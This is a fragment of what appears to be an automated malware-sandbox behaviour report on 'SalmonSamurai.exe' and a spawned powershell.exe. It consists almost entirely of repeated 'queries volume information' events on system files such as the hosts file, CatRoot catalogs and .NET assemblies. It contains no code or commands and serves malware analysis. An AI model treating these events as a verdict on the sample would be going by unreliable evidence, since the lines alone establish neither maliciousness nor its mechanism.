Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\Users\user\AppData\Roaming\NsisExtracted\resources VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asar VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
